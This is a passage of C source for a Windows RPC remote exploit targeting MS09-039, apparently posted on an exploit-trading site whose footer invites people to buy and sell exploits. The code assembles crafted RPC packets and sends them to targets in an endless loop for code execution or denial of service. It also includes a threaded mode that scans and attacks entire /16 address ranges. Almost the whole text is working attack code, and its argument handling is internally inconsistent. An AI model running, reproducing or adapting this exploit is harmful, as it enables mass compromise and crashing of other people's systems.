// *(WORD *)(rawData+0x62)=sz+sz1+(0x240-(0x71+sz)); 
*(WORD *)(rawData+0x62)=sz; 


memcpy(buf2,request1,sizeof(request1)); 
*(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(rawData)/2; 
*(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(rawData)/2; 
memcpy(buf2+len1,request2,sizeof(request2)); 
len1=len1+sizeof(request2); 

memcpy(buf2+len1,rawData,sizeof(rawData)); 
len1=len1+sizeof(rawData); 

memcpy(buf2+len1,request3,sizeof(request3)); 
len1=len1+sizeof(request3); 
memcpy(buf2+len1,request4,sizeof(request4)); 
len1=len1+sizeof(request4); 
*(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc; 

*(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc; 
*(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc; 
*(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc; 
*(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc; 
*(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc; 
*(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc; 
*(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc; 

closesocket(sock); 
if(atack) 
{ 
sock=socket(2,1,0); 
WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL); 

if (send(sock,(const char *)bindstr,sizeof(bindstr),0)==SOCKET_ERROR) 
{ 
printf("%s - send failed %d\n",ip,WSAGetLastError()); 
return 0; 
} 
else {printf("%s - send exploit to %s\n",ip,target_os[vers].target);} 

len=recv(sock,(char *)buf1,1000,NULL); 
bool ft=1; 
if(ft) 
{ 
int i=0; 
while(1) 
{ 
if (send(sock,(const char *)buf2,len1,0)==SOCKET_ERROR) 
{ 
printf("\nSend failed.Error:%d\n",WSAGetLastError()); 
return 0; 
} 
else 
{ 
printf("\r%d",++i); 
} 
//Sleep(1000); 
} 
} 
send(sock,(const char *)buf2,len1,0); 
closesocket(sock); 
} 
else fprintf(fp1,"%s %s\n",target_os[vers].target,ip); 
// fp=fopen("pac","wb"); 
// fwrite(rawData,1,1036,fp); 
// fclose(fp); 
} 
unsigned long thread_count=0; 
char adr[200]; 

DWORD WINAPI ThreadProc( 
LPVOID lpParameter // thread data 
) 
{ 
thread_count++; 
attack(adr,0); 

thread_count--; 
return 0; 
} 

int main(int argc,char ** argv) 
{ 
//printf("%x %x",OF_READWRITE,GETSTRCS(argv[1])); 
//return; 
//HFILE hf=_lopen("asd123",0x1001); 
//printf("%x",hf); 
//_lclose(hf); 
//return; 

if(argc!=2){
fprintf(stderr, "RPC universal exploit. Exploit MS09-039 vulnerability\n"
"unpatched host - to codee xecution\n"
"patched host - to DoS\n"
"based on original XFocus RPCDCOM2 exploit\n"
"modification and shellcode (c) by karlss0n\n"
"downloaded on www.k-otik.com\n"
"\n"
"usage: %s <target_ip>\n",
argv[0]);
return 10;
}

WSADATA wsaData; 

int wVersionRequested; 
wVersionRequested = MAKEWORD( 2, 2 ); 

int err = WSAStartup( wVersionRequested, &wsaData ); 
if ( err != 0 ) { 
/* Tell the user that we could not find a usable */ 
/* WinSock DLL. */ 
return 1; 
} 


if(strchr(argv[1],'.')) 
{ 
attack(argv[1],1); 
Sleep(20000); 
return 2; 
} 
int cb=1,db=1; 
cb=atoi(argv[3]); 
db=atoi(argv[4]); 
long tm=atoi(argv[5]); 
for(int c=cb;c<255;c++) 
{ 
for(int d=db;d<255;d++) 
{ 
sprintf(adr,"%s.%s.%d.%d",argv[1],argv[2],c,d); 
if(thread_count>tm) while(thread_count>tm) Sleep(100); 
CreateThread(NULL,0,&ThreadProc,(void *)"",0,NULL); 
Sleep(10); 
fflush(fp1); 
} 
} 
Sleep(60000); 
fclose(fp1); 
return 0;

}

 

#  0day.today [2024-11-16]  #
0day Today Exploit Database buy and sell exploits type (local, remote, DoS, PoC, etc.)
Send all submissions to mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team